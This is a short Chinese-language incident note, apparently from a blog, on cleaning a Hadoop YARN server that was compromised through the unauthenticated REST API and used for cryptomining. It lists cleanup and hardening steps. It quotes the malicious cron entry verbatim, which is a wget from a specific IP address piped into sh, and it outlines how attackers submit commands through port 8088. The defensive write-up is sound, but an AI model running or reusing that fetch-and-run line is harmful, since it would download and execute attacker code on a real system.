用戶為dr.who,問下內部使用人員,都沒有任務在跑;
結論:
恭喜你,你中毒了,攻擊者利用Hadoop Yarn資源管理系統REST API未授權漏洞對服務器進行攻擊,攻擊者可以在未授權的情況下遠程執行代碼的安全問題進行預警
用top命令發現cpu使用了360%多,系統會很卡。
解決辦法:
1,通過查看占用cpu高得進程,kill掉此進程
2,檢查/tmp和/var/tmp目錄,刪除java、ppc、w.conf等異常文件
3 ,通過crontab -l 查看有一個* * * * * wget -q -O - http://46.249.38.186/cr.sh | sh > /dev/null 2>&1任務,刪除此任務
4,排查YARN日志,確認異常的application,刪除處理
再通過top驗證看是否還有高cpu進程,如果有,kill掉,沒有的話應該正常了。
注意:YARN提供有默認開放在8088和8090的REST API(默認前者)允許用戶直接通過API進行相關的應用創建、任務提交執行等操作,如果配置不當,REST API將會開放在公網導致未授權訪問的問題,那么任何黑客則就均可利用其進行遠程命令執行,從而進行挖礦等行為,黑客直接利用開放在8088的REST API提交執行命令,來實現在服務器內下載執行.sh腳本,從而再進一步下載啟動挖礦程序達到挖礦的目的,因此注意並啟用Kerberos認證功能,禁止匿名訪問修改8088端口